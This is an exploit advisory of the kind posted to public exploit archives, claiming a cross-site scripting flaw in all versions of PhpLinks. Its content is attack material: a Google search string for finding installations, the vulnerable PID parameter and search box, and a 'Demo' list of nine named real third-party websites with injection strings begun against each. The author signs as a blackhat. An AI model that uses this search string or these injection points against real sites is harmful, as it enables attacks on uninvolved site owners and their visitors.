#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: PhpLinks Cross Site Scripting Vulnerability # Date: 2013 15 September # Author: Arsan # Vendor Homepage: www.newphplinks.com # Version : All Version # Tested on: Linux & Windows # Category: webapps # Google Keywords: inurl:"/index.php?PID=" intext:"Powered By phpLinks" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # http:///index.php?PID=[XSS] # http:///[XSS In SearchBox] # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # www.net-sleuth.com/index.php?PID=5"> # www.eheli.at/phplinks/index.php?PID=5"> # www.ingegneriambientali.it/cercambiente/index.php?PID=5"> # www.touristinfo.it/index.php?PID=205"> # www.lupus.france-timbres.net/index.php?PID=10"> # www.links.svalbard.com/index.php?PID=3"> # www.remodelnet.com/links/index.php?PID=6"> # www.dietrich.kracht.free.fr/phplinks/index.php?PID=4"> # www.myav.com.tw/avlinks/index.php?PID=5"> # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#